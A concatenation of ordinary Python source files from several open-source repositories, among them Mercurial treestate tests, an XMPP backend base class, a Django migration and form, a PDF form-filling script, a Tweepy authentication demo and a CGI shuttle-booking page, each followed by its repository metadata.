self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testsaveas(self):
treepath = os.path.join(testtmp, "saveas")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
tree.flush()
tree.insert("b", 1, 2, 3, 4, None)
tree.remove("a")
treepath = "%s-savedas" % treepath
tree.setmetadata(b"2")
rootid = tree.saveas(treepath)
tree = treestate.treestate(treepath, rootid)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testfiltered(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/B/c", 1, 2, 3, 4, None)
filtered = tree.getfiltered("A/B/C", lambda x: x.upper(), 1)
self.assertEqual(filtered, ["a/B/c"])
filtered = tree.getfiltered("A/B/C", lambda x: x, 2)
self.assertEqual(filtered, [])
def testpathcomplete(self):
treepath = os.path.join(testtmp, "pathcomplete")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
def complete(prefix, fullpath=False):
completed = []
tree.pathcomplete(prefix, 0, 0, completed.append, fullpath)
return completed
self.assertEqual(complete(""), ["a/", "de"])
self.assertEqual(complete("d"), ["de"])
self.assertEqual(complete("a/"), ["a/b/", "a/c"])
self.assertEqual(complete("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(complete("a/b/c"), ["a/b/c"])
self.assertEqual(complete("", True), paths)
def testgetdir(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/b/c", 3, 0, 0, 0, None)
tree.insert("a/d", 5, 0, 0, 0, None)
self.assertEqual(tree.getdir("/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/b/"), (3, 3))
self.assertIsNone(tree.getdir("a/b/c/"))
tree.insert("a/e/f", 10, 0, 0, 0, None)
self.assertEqual(tree.getdir("a/"), (3 | 5 | 10, 3 & 5 & 10))
tree.remove("a/e/f")
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
def testsubdirquery(self):
treepath = os.path.join(testtmp, "subdir")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.tracked(""), paths)
self.assertEqual(tree.tracked("de"), ["de"])
self.assertEqual(tree.tracked("a"), [])
self.assertEqual(tree.tracked("a/"), ["a/b/c", "a/b/d", "a/c"])
self.assertEqual(tree.tracked("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(tree.tracked("a/b"), [])
self.assertEqual(tree.tracked("a/c/"), [])
self.assertEqual(tree.tracked("a/c"), ["a/c"])
if __name__ == "__main__":
silenttestrunner.main(__name__)
|
facebookexperimental/eden
|
eden/scm/tests/test-treestate.py
|
Python
|
gpl-2.0
| 9,519
|
Dependencies
Python2.7
Python Requests
python-rt https://gitlab.labs.nic.cz/labs/python-rt
(should have a local copy installed on tsbackup, unntested with newer versions)
jsondb
request_tracker
these last two are in the freegeek github repostitory
configure EMAIL, WEEKLYDB, MONTHLYDB on installed copy
use in cronjob with -m flag set
there is an (untested) fabfile.cfg that can be used with fabfile.py to eas inastall
requires python-fabric
|
freegeek-pdx/ts_rt_scripts
|
README_generate_completion_reports.py
|
Python
|
gpl-2.0
| 448
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-10 09:46
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bookinstance',
name='borrower',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
]
|
tridc/django_local_library
|
catalog/migrations/0002_bookinstance_borrower.py
|
Python
|
gpl-3.0
| 661
|
''' forms, mostly used for simple tastypie validation '''
from django.contrib.gis import forms
class MeetingForm(forms.Form):
''' form for meetings '''
day_of_week = forms.IntegerField(min_value=1, max_value=7)
start_time = forms.TimeField()
end_time = forms.TimeField()
name = forms.CharField(max_length=100)
description = forms.CharField(max_length=255, required=False)
address = forms.CharField(max_length=300)
|
mcjug2015/mfserver2
|
django_app/forms.py
|
Python
|
gpl-3.0
| 444
|
# This file is part of xmpp-backends (https://github.com/mathiasertl/xmpp-backends).
#
# xmpp-backends is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# xmpp-backends is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along with xmpp-backends. If not, see
# <http://www.gnu.org/licenses/>.
"""Common code for XMPP backends."""
import ipaddress
import logging
import random
import re
import string
import time
from datetime import datetime
from datetime import timedelta
from importlib import import_module
import pytz
from .constants import CONNECTION_HTTP_BINDING
from .constants import CONNECTION_UNKNOWN
from .constants import CONNECTION_XMPP
log = logging.getLogger(__name__)
class BackendError(Exception):
"""All backend exceptions should be a subclass of this exception."""
pass
class InvalidXmppBackendError(BackendError):
"""Raised when a module cannot be imported."""
pass
class BackendConnectionError(BackendError):
"""Raised when the backend is unavailable."""
pass
class NotSupportedError(BackendError):
"""Raised when a backend does not support a specific function.
This error may be thrown only with specific versions, e.g. if it requires minimum version.
"""
pass
class UserExists(BackendError):
"""Raised when a user already exists."""
pass
class UserNotFound(BackendError):
"""Raised when a user is not found."""
def __init__(self, node, domain, resource=None):
self.node = node
self.domain = domain
self.resource = resource
def __str__(self):
s = '%s@%s' % (self.node, self.domain)
if self.resource is not None:
s += '/%s' % self.resource
return s
class UserSession(object):
"""An object describing a user session.
:param backend: The XMPP backend used for retrieving this session.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the user.
:param priority: The priority of this connection.
:param ip_address: The IP address of this connection.
:param uptime: A timestamp of when this connection came online.
:param status: The status message for this connection (e.g. "I am available.").
:param connection_type: The type of connection.
:param encrypted: If this connection is encrypted. This may be ``None`` if the backend is not able
decide if the connection is encrypted (e.g. if it is a HTTP bind connection).
:param compressed: If this connection uses XMPP stream compression. This is always ``None`` for
connections where this is not applicable, e.g. Websocket connections.
"""
def __init__(self, backend, username, domain, resource, priority, ip_address, uptime, status, status_text,
connection_type, encrypted, compressed):
self._backend = backend
self.username = username
self.domain = domain
self.jid = '%s@%s' % (username, domain)
self.resource = resource
self.priority = priority
self.ip_address = ip_address
self.uptime = uptime
self.status = status
self.status_text = status_text
self.connection_type = connection_type
self.encrypted = encrypted
self.compressed = compressed
def __eq__(self, other):
return isinstance(other, UserSession) and self.jid == other.jid and self.resource == other.resource
def __hash__(self):
return hash((self.jid, self.resource))
def __str__(self):
return '%s@%s/%s' % (self.username, self.domain, self.resource)
def __repr__(self):
return '<UserSession: %s@%s/%s>' % (self.username, self.domain, self.resource)
class XmppBackendBase(object):
"""Base class for all XMPP backends."""
library = None
"""Import-party of any third-party library you need.
Set this attribute to an import path and you will be able to access the module as ``self.module``. This
way you don't have to do a module-level import, which would mean that everyone has to have that library
installed, even if they're not using your backend.
:param version_cache_timeout: How long the API version for this backend will be cached.
:type version_cache_timeout: int or timedelta
"""
_module = None
minimum_version = None
version_cache_timeout = None
version_cache_timestamp = None
version_cache_value = None
def __init__(self, version_cache_timeout=3600):
if isinstance(version_cache_timeout, int):
version_cache_timeout = timedelta(seconds=version_cache_timeout)
self.version_cache_timeout = version_cache_timeout
super(XmppBackendBase, self).__init__()
@property
def module(self):
"""The module specified by the ``library`` attribute."""
if self._module is None:
if self.library is None:
raise ValueError(
"Backend '%s' doesn't specify a library attribute" % self.__class__)
try:
if '.' in self.library:
mod_path, cls_name = self.library.rsplit('.', 1)
mod = import_module(mod_path)
self._module = getattr(mod, cls_name)
else:
self._module = import_module(self.library)
except (AttributeError, ImportError):
raise ValueError("Couldn't load %s backend library" % cls_name)
return self._module
def datetime_to_timestamp(self, dt):
"""Helper function to convert a datetime object to a timestamp.
If datetime instance ``dt`` is naive, it is assumed that it is in UTC.
In Python 3, this just calls ``datetime.timestamp()``, in Python 2, it substracts any timezone offset
and returns the difference since 1970-01-01 00:00:00.
Note that the function always returns an int, even in Python 3.
>>> XmppBackendBase().datetime_to_timestamp(datetime(2017, 9, 17, 19, 59))
1505678340
>>> XmppBackendBase().datetime_to_timestamp(datetime(1984, 11, 6, 13, 21))
468595260
:param dt: The datetime object to convert. If ``None``, returns the current time.
:type dt: datetime
:return: The seconds in UTC.
:rtype: int
"""
if dt is None:
return int(time.time())
if not dt.tzinfo:
dt = pytz.utc.localize(dt)
return int(dt.timestamp())
def get_random_password(self, length=32, chars=None):
"""Helper function that gets a random password.
:param length: The length of the random password.
:type length: int
:param chars: A string with characters to choose from. Defaults to all ASCII letters and digits.
:type chars: str
"""
if chars is None:
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(length))
@property
def api_version(self):
"""Cached version of :py:func:`~xmpp_backends.base.XmppBackendBase.get_api_version`."""
now = datetime.utcnow()
if self.version_cache_timestamp and self.version_cache_timestamp + self.version_cache_timeout > now:
return self.version_cache_value # we have a cached value
self.version_cache_value = self.get_api_version()
if self.minimum_version and self.version_cache_value < self.minimum_version:
raise NotSupportedError('%s requires ejabberd >= %s' % (self.__class__.__name__,
self.minimum_version))
self.version_cache_timestamp = now
return self.version_cache_value
def get_api_version(self):
"""Get the API version used by this backend.
Note that this function is usually not invoked directly but through
:py:attr:`~xmpp_backends.base.XmppBackendBase.api_version`.
The value returned by this function is used by various backends to determine how to call various API
backends and/or how to parse th data returned by them. Backends generally assume that this function is
always working and return the correct value.
If your backend implementation cannot get this value, it should be passed via the constructor and
statically returned for the livetime of the instance.
"""
raise NotImplementedError
def user_exists(self, username, domain):
"""Verify that the given user exists.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:return: ``True`` if the user exists, ``False`` if not.
:rtype: bool
"""
raise NotImplementedError
def user_sessions(self, username, domain):
"""Get a list of all current sessions for the given user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:return: A list :py:class:`~xmpp_backends.base.UserSession` describing the user sessions.
:rtype: list of :py:class:`~xmpp_backends.base.UserSession`
"""
raise NotImplementedError
def stop_user_session(self, username, domain, resource, reason=''):
"""Stop a specific user session, identified by its resource.
A resource uniquely identifies a connection by a specific client.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the connection
:type resource: str
"""
raise NotImplementedError
def create_user(self, username, domain, password, email=None):
"""Create a new user.
:param username: The username of the new user.
:type username: str
:param domain: The domain of the new user.
:type domain: str
:param password: The password of the new user.
:param email: The email address provided by the user.
"""
raise NotImplementedError
def create_reservation(self, username, domain, email=None):
"""Reserve a new account.
This method is called when a user account should be reserved, meaning that the account can no longer
be registered by anybody else but the user cannot yet log in either. This is useful if e.g. an email
confirmation is still pending.
The default implementation calls :py:func:`~xmpp_backends.base.XmppBackendBase.create_user` with a
random password.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param email: The email address provided by the user. Note that at this point it is not confirmed.
You are free to ignore this parameter.
"""
password = self.get_random_password()
self.create(username=username, domain=domain, password=password, email=email)
def confirm_reservation(self, username, domain, password, email=None):
"""Confirm a reservation for a username.
The default implementation just calls :py:func:`~xmpp_backends.base.XmppBackendBase.set_password` and
optionally :py:func:`~xmpp_backends.base.XmppBackendBase.set_email`.
"""
self.set_password(username=username, domain=domain, password=password)
if email is not None:
self.set_email(username=username, domain=domain, email=email)
def check_password(self, username, domain, password):
"""Check the password of a user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param password: The password to check.
:type password: str
:return: ``True`` if the password is correct, ``False`` if not.
:rtype: bool
"""
raise NotImplementedError
def set_password(self, username, domain, password):
"""Set the password of a user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param password: The password to set.
:type password: str
"""
raise NotImplementedError
def get_last_activity(self, username, domain):
"""Get the last activity of the user.
The datetime object returned should be a naive datetime object representing the time in UTC.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:return: A naive datetime object in UTC representing the last activity.
:rtype: datetime
"""
raise NotImplementedError
def set_last_activity(self, username, domain, status='', timestamp=None):
"""Set the last activity of the user.
.. NOTE::
If your backend requires a Unix timestamp (seconds since 1970-01-01), you can use the
:py:func:`~xmpp_backends.base.XmppBackendBase.datetime_to_timestamp` convenience function to
convert it to an integer.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param status: The status text.
:type status: str
:param timestamp: A datetime object representing the last activity. If the object is not
timezone-aware, assume UTC. If ``timestamp`` is ``None``, assume the current date and time.
:type timestamp: datetime
"""
raise NotImplementedError
def block_user(self, username, domain):
"""Block the specified user.
The default implementation calls :py:func:`~xmpp_backends.base.XmppBackendBase.set_password` with a
random password.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
self.set_password(username, domain, self.get_random_password())
def set_email(self, username, domain, email):
"""Set the email address of a user."""
raise NotImplementedError
def check_email(self, username, domain, email):
"""Check the email address of a user.
**Note:** Most backends don't implement this feature.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
raise NotImplementedError
def expire_reservation(self, username, domain):
"""Expire a username reservation.
This method is called when a reservation expires. The default implementation just calls
:py:func:`~xmpp_backends.base.XmppBackendBase.remove_user`. This is fine if you do not override
:py:func:`~xmpp_backends.base.XmppBackendBase.create_reservation`.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
self.remove_user(username, domain)
def message_user(self, username, domain, subject, message):
"""Send a message to the given user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param subject: The subject of the message.
:param message: The content of the message.
"""
pass
def all_users(self, domain):
"""Get all users for a given domain.
:param domain: The domain of interest.
:type domain: str
:return: A set of all users. The usernames do not include the domain, so ``user@example.com`` will
just be ``"user"``.
:rtype: set of str
"""
raise NotImplementedError
def all_domains(self):
"""List of all domains used by this backend.
:return: List of all domains served by this backend.
:rtype: list of str
"""
raise NotImplementedError
def all_user_sessions(self):
"""List all current user sessions.
:param domain: Optionally only return sessions for the given domain.
:return: A list :py:class:`~xmpp_backends.base.UserSession` for all sessions.
:rtype: list of :py:class:`~xmpp_backends.base.UserSession`
"""
raise NotImplementedError
def remove_user(self, username, domain):
"""Remove a user.
This method is called when the user explicitly wants to remove her/his account.
:param username: The username of the new user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
raise NotImplementedError
def stats(self, stat, domain=None):
"""Get statistical value about the XMPP server.
Minimal statistics that should be supported is ``"registered_users"`` and ``"online_users"``. The
specific backend might support additional stats.
:param stat: The value of the statistic.
:type stat: str
:param domain: Limit statistic to the given domain. If not listed, give statistics
about all users.
:type domain: str
:return: The current value of the requested statistic.
:rtype: int
"""
raise NotImplementedError
class EjabberdBackendBase(XmppBackendBase):
"""Base class for ejabberd related backends.
This class overwrites a few methods common to all ejabberd backends.
"""
minimum_version = (14, 7)
def parse_version_string(self, version):
return tuple(int(t) for t in version.split('.'))
def parse_status_string(self, data):
match = re.search(r'([^ ]*) is running in that node', data)
if not match:
raise BackendError('Could not determine API version.')
return self.parse_version_string(match.groups()[0].split('-', 1)[0])
def has_usable_password(self, username, domain):
"""Always return ``True``.
In ejabberd there is no such thing as a "banned" account or an unusable password. Even ejabberd's
``ban_account`` command only sets a random password that the user could theoretically guess.
"""
return True
def set_email(self, username, domain, email):
"""Not yet implemented."""
pass
def check_email(self, username, domain, email):
"""Not yet implemented."""
pass
def parse_connection_string(self, connection):
"""Parse string as returned by the ``connected_users_info`` or ``user_sessions_info`` API calls.
>>> EjabberdBackendBase().parse_connection_string('c2s_tls')
(0, True, False)
>>> EjabberdBackendBase().parse_connection_string('c2s_compressed_tls')
(0, True, True)
>>> EjabberdBackendBase().parse_connection_string('http_bind')
(2, None, None)
:param connection: The connection string as returned by the ejabberd APIs.
:type connection: str
:return: A tuple representing the conntion type, if it is encrypted and if it uses XMPP stream
compression.
:rtype: tuple
"""
# TODO: Websockets, HTTP Polling
if connection == 'c2s_tls':
return CONNECTION_XMPP, True, False
elif connection == 'c2s_compressed_tls':
return CONNECTION_XMPP, True, True
elif connection == 'http_bind':
return CONNECTION_HTTP_BINDING, None, None
elif connection == 'c2s':
return CONNECTION_XMPP, False, False
log.warn('Could not parse connection string "%s"', connection)
return CONNECTION_UNKNOWN, True, True
def parse_ip_address(self, ip_address):
"""Parse an address as returned by the ``connected_users_info`` or ``user_sessions_info`` API calls.
Example::
>>> EjabberdBackendBase().parse_ip_address('192.168.0.1') # doctest: +FORCE_TEXT
IPv4Address('192.168.0.1')
>>> EjabberdBackendBase().parse_ip_address('::FFFF:192.168.0.1') # doctest: +FORCE_TEXT
IPv4Address('192.168.0.1')
>>> EjabberdBackendBase().parse_ip_address('::1') # doctest: +FORCE_TEXT
IPv6Address('::1')
:param ip_address: An IP address.
:type ip_address: str
:return: The parsed IP address.
:rtype: `ipaddress.IPv6Address` or `ipaddress.IPv4Address`.
"""
if ip_address.startswith('::FFFF:'):
ip_address = ip_address[7:]
return ipaddress.ip_address(ip_address)
|
mathiasertl/xmpp-backends
|
xmpp_backends/base.py
|
Python
|
gpl-3.0
| 21,732
|
import uncertainties
from uncertainties import ufloat
import math
import numpy
import numpy
import pylab
from scipy.optimize import curve_fit
import math
import scipy.stats
#Misuro a mano con il tester i valori che poi vado a mettere nel file, posso anche lasciare lo sfasamento vuoto
def linear(x, a, b):
return a*x+b
def fitPassaBasso(x, f_0):
return 1/pylab.sqrt(1/(1+(x/f_0)^2))
Vout_o, dVout_o, f_o, df_o = pylab.loadtxt('/home/federico/Laboratorio3/relazione2/datiPassaBasso.txt', unpack=True)
#Trascuriamo la resistenza in in uscita del generatore di funzioni cosi che V_in sia circa costante.
Vin = 5.0 #Misurata una volta per tutte l'ampiezza massima
dVin = 0.15
A_o = Vout_o/Vin
dA_o = A_o *pow(((dVout_o/Vout_o)**2 + (dVin/Vin)**2), 0.5)
B_o = 20 * pylab.log10(A_o)
dB_o = 8.7*dA_o/A_o
logf_o = pylab.log10(f_o)
dlogf_o = (1/pylab.log(10))*df_o/f_o
print(dlogf_o)
print(dB_o)
pylab.figure(1)
pylab.title('Bode diagram of low-pass RC filter')
pylab.xlabel('frequency [kHz]')
pylab.ylabel('gain [dB]')
pylab.ylim(-50, 2)
pylab.xlim(1, 7)
pylab.grid(color = "gray")
pylab.grid(color = "gray")
pylab.errorbar(logf_o, B_o, dB_o, dlogf_o, "o", color="black")
init = numpy.array([0.0, 0.0])
par_o, cov_o = curve_fit(linear, logf_o, B_o, init, pylab.sqrt(dB_o*dB_o+20.0*dlogf_o*dlogf_o))
print(par_o, cov_o)
chisq = (((dB_o - linear(logf_o, par_o[0], par_o[1]))/(pylab.sqrt(dB_o*dB_o+20.0*dlogf_o*dlogf_o)))**2).sum()
ndof = len(logf_o) - 2 #Tolgo due parametri estratti dal fit
p=1.0-scipy.stats.chi2.cdf(chisq, ndof)
print("Chisquare/ndof = %f/%d" % (chisq, ndof))
print("p = ", p)
#Routine per stampare due rette:
div = 1000
bucket = numpy.array([0.0 for i in range(div)])
retta = numpy.array([0.0 for i in range(div)])
inc = 6/div
for i in range(len(bucket)):
bucket[i]=float(i)*inc
retta[i] = linear(bucket[i], par_o[0], par_o[1])
pylab.plot(bucket, retta, color = "red")
pylab.show()
|
fedebell/Laboratorio3
|
relazione2/scriptVecchi/bode.py
|
Python
|
gpl-3.0
| 1,939
|
# (C) Copyright 2016 Vit Mojzis, vmojzis@redhat.com
#
# This program is distributed under the terms of the GNU General Public License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sepolicyanalysis.domain_grouping as grouping
import sys
# read "security_related.conf" and return corresponding types
# returns (domain_types, resource_types)
def get_security_types():
try:
packages = set()
types = set()
exclude = set()
txt = open("/etc/sepolicyanalysis/security_related.conf", "r")
packages = {}
for line in txt:
if (len(line) < 1) or (line[0] == '#'):
continue
if line.startswith("packages="):
packages = set([x.strip() for x in line[9:].split(",")])
if line.startswith("types=="):
types = set([x.strip() for x in line[6:].split(",")])
if line.startswith("exclude="):
exclude = set([x.strip() for x in line[8:].split(",")])
#all types given in "types=" are treated as domains !
domain_grouping = grouping.group_types_cil()
groups = set()
for name in packages:
group = domain_grouping.get(name, None)
if group:
groups.add(group)
#get types corresponding to given packages
domains, resources = grouping.get_types(groups)
domains = domains | types
# remove excluded types
domains = domains - exclude
resources = resources - exclude
return domains, resources
except IOError as e:
print('Could not read "security_related.conf"!', file=sys.stderr)
return set(), set()
|
vmojzis/sepolicy_analysis
|
sepolicyanalysis/security_related.py
|
Python
|
gpl-3.0
| 2,061
|
#!/usr/bin/python3
# Instalar :
# * python3-pdfrw
import os
from pdfrw import PdfWriter, PdfReader, IndirectPdfDict, PdfName, PdfDict,PdfObject
INVOICE_TEMPLATE_PATH = 'templates/9_FP_GM_I_GS_AUTOBIS.pdf' # DOCUMENTO BASE
INVOICE_OUTPUT_PATH = 'invoice.pdf' #DESTINO
ANNOT_KEY = '/Annots'
ANNOT_FIELD_KEY = '/T'
ANNOT_VAL_KEY = '/V'
ANNOT_RECT_KEY = '/Rect'
SUBTYPE_KEY = '/Subtype'
WIDGET_SUBTYPE_KEY = '/Widget'
def write_fillable_pdf(input_pdf_path, output_pdf_path, data_dict):
template_pdf = PdfReader(input_pdf_path)
# Para que se vean los campos rellenados
template_pdf.Root.AcroForm.update(PdfDict(NeedAppearances=PdfObject('true')))
for page in template_pdf.pages:
annotations = page[ANNOT_KEY]
for annotation in annotations:
if annotation[SUBTYPE_KEY] == WIDGET_SUBTYPE_KEY:
if annotation[ANNOT_FIELD_KEY]:
key = annotation[ANNOT_FIELD_KEY][1:-1]
if key in data_dict.keys():
#HACK PARA LOS CHECK - Guardar documento a mano con los checks que sean. Y aquí si es un check, evitarlo y no cambiar
if key=="untitled6" or key=="untitled21" or key=="untitled22" or key=="untitled23" or key=="untitled24" or key=="untitled25" :
continue
#this depends on page orientation
rct = annotation.Rect
hight = round(float(rct[3]) - float(rct[1]),2)
width =(round(float(rct[2]) - float(rct[0]),2))
xobj = PdfDict(
BBox = [0, 0, width, hight],
FormType = 1,
Resources = PdfDict(ProcSet = [PdfName.PDF, PdfName.Text]),
Subtype = PdfName.Form,
Type = PdfName.XObject
)
#assign a stream to it
xobj.stream = '''/Tx BMC
BT
/Helvetica 8.0 Tf
1.0 5.0 Td
0 g
(''' + data_dict[key] + ''') Tj
ET EMC'''
annotation.update(PdfDict(AP=PdfDict(N = xobj),V='{}'.format(data_dict[key])))
#annotation.update(pdfrw.PdfDict(V='{}'.format(data_dict[key]),AP='{}'.format(data_dict[key])))
PdfWriter().write(output_pdf_path, template_pdf)
data_dict = {
'untitled1': '46017675', #Codigo de centro
'untitled5': 'IES La Sènia', #Nombre del centro
'untitled6': PdfName('Yes'), #Centro titularidad publica
'untitled2': 'Paiporta', #Localidad centro
'untitled4': 'Valencia', #Provincia centro
'untitled8': '961 20 59 55', #Telefono Centro
'untitled3': 'Calle Escultor José Capuz, 96', #Direccion Centro
'untitled9': '46200', #Codigo Postal Centro
'untitled10': 'NIA', #NIA Alumno
'untitled11': 'Curso', #Curso Alumno
'untitled12': 'Apellidos, Nombre', #Apellidos, Nombre - Alumnos
'untitled15': 'Desarrollo de Aplicaciones Web', #Titulo ciclo
'untitled16': 'Superior', #Grado ciclo
'untitled18': 'Punto 1.1', #Punto 1.1
'untitled17': 'Punto 1.2', #Punto 1.2
'untitled19': 'Punto 1.3', #Punto 1.3
'untitled20': 'Punto 1.4', #Punto 1.4
'untitled21': 'true', #Check Avanzado
'untitled22': 'false', #Check Intermedio
'untitled23': 'false', #Check Basico
'untitled24': 'false', #Check No superado
'untitled25': 'Punto 2.1', #Punto 2.1
'untitled26': 'Punto 2.2', #Punto 2.2
'untitled27': 'Punto 2.3', #Punto 2.3
'untitled28': 'Punto 2.4', #Punto 2.4
'untitled30': 'Paiporta', #Firma Valencia
'untitled31': '28', #Firma dia
'untitled32': 'Mayo' #Firma Mes
}
if __name__ == '__main__':
write_fillable_pdf(INVOICE_TEMPLATE_PATH, INVOICE_OUTPUT_PATH, data_dict)
print(" * Rellenado ")
|
aberlanas/senia-cdd
|
tools/rellenarFormularioFP.py
|
Python
|
gpl-3.0
| 3,975
|
# -*- coding: utf-8 -*-#
"""
Basic Twitter Authentication
requirements: Python 2.5+ tweepy (easy_install tweepy | pip install tweepy)
"""
__author__ = 'Bernie Hogan'
__version__= '1.0'
import string
import codecs
import os
import pickle
import copy
import sys
import json
import webbrowser
import tweepy
from tweepy import Cursor
import twitterhelpers as th
def getFollowerCount(api, screen_name="BarackObama"):
user = api.get_user(screen_name)
return user.followers_count
def getFollowingCount(api, screen_name="BarackObama"):
user = api.get_user(screen_name)
print user
print dir(user)
return user.friends_count
if __name__=='__main__':
CONSUMER_KEY = th.CONSUMER_KEY
CONSUMER_SECRET = th.CONSUMER_SECRET
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
ACCESS_TOKEN_SECRET = th.ACCESS_TOKEN_SECRET
ACCESS_TOKEN = th.ACCESS_TOKEN
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
print "Now you have received an access token."
print "Or rather, your account has authorized this application to use the twitter api."
print "You have this many hits to the API left this hour: "
# print json.dumps(api.rate_limit_status(), indent = 1) #['remaining_hits']
print getFollowerCount(api, "blurky")
print getFollowingCount(api, "blurky")
|
oxfordinternetinstitute/scriptingcourse
|
DSR-Week 2/wk02_twitter_test.py
|
Python
|
gpl-3.0
| 1,313
|
#!/usr/bin/env python
"""list all previously made bookings"""
import os
import sys
import cgi
import datetime
import json
import shuttle
import shconstants
import smtplib
import shcookie
print "Content-type: text/html\r\n"
shuttle.do_login(shcookie.u, shcookie.p)
form = cgi.FieldStorage()
if 'action' in form:
act = form.getvalue("action")
if act == "cancel":
id = form.getvalue("id")
shuttle.cancel_booking(id)
show_all_routes = 'ar' in form
bookings = shuttle.get_bookings()
print '''<html>
<head>
<title>Connector bookings for %s</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<link href="style.css" rel="stylesheet" />
</head>
<body>''' % (shcookie.u)
alldata = json.load(open("all.json"))
routes = [r[:-3] for r in alldata["true"].keys()]
routes.sort()
routes = [[r, alldata["true"][r + " AM"][2]] for r in routes if len(shcookie.routes) == 0 or show_all_routes or alldata["true"][r + " AM"][2] in shcookie.routes]
# header bar
print '<div id="newbar"><div id="newbarin">'
for r in routes:
print '''<span class="newbutton">
<a href="new.py?r=%s" class="l">%s</a>
</span>''' % (r[1], r[0])
if len(shcookie.routes) != 0 and not show_all_routes:
print '''<span class="newbutton"><a href="bookings.py?ar=1" class="l">all routes</a></span>'''
print '</div></div>'
# list of rides
if 'cal' in form:
cal = form.getvalue("cal")
print '''<div id="outlook">
<a href="outlook.py?cal=%s">download booked trip</a>
</div>''' % (cal)
print '<div id="bookings">'
for b in bookings:
past = False
dt = datetime.datetime.strptime(b['dd'] + ' ' + b['dt'], "%m/%d/%Y %I:%M %p")
if dt < datetime.datetime.now() - datetime.timedelta(hours=2) - datetime.timedelta(minutes=60):
continue
if "PM" in b['dt']:
csspm = " pm"
else:
csspm = ""
if dt < datetime.datetime.now() - datetime.timedelta(hours=2) - datetime.timedelta(minutes=1):
past = True
csspm += " past"
print '''<div class="booking%s">
<span class="t">%s</span>
<span class="r">%s</span>
<span class="dt">%s</span><span class="dl">%s</span>
<span class="gt">%s</span><span class="gl">%s</span>''' % (
csspm, dt.strftime("%A, %b %d"), b['r'], b['dt'], b['dl'], b['gt'], b['gl'])
if 'cn' in b:
print ' <span class="cn">Connector %s</span>' % (b['cn'])
if not past:
loc = shuttle.get_shuttle_location(b['r'], b['cn'])
if loc != None:
stop = shuttle.get_stop_gps(b['r'], b['dl'])
if stop != None:
dst = shuttle.get_maps_eta((loc['lat'], loc['lon']), (stop[0], stop[1]))
print ' <span class="et">ETA: %s (<a href="https://www.google.com/maps?q=%f,%f">%s</a>)</span>' % (
dst[1], loc['lat'], loc['lon'], dst[0])
if 'cl' in b:
print ''' <form method="post" action="%s" onsubmit="return confirm('Cancel?');">
<input type="hidden" name="action" value="cancel"/>
<input type="hidden" name="id" value="%s"/>
<input type="submit" value="cancel"/>
</form>''' % (os.environ["SCRIPT_NAME"], b['cl'])
print '</div>'
print '</div></body><!--'
# print datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
print '--></html>'
|
christianholz/QuickShuttle
|
bookings.py
|
Python
|
gpl-3.0
| 3,213
|
import random
import os
# TicTacToe
def createNewField():
result = []
for i in range(3):
tmp = []
for i2 in range(3):
tmp.append(' ')
result.append(tmp)
return result
def printField(field):
print ''
for element in field:
print element
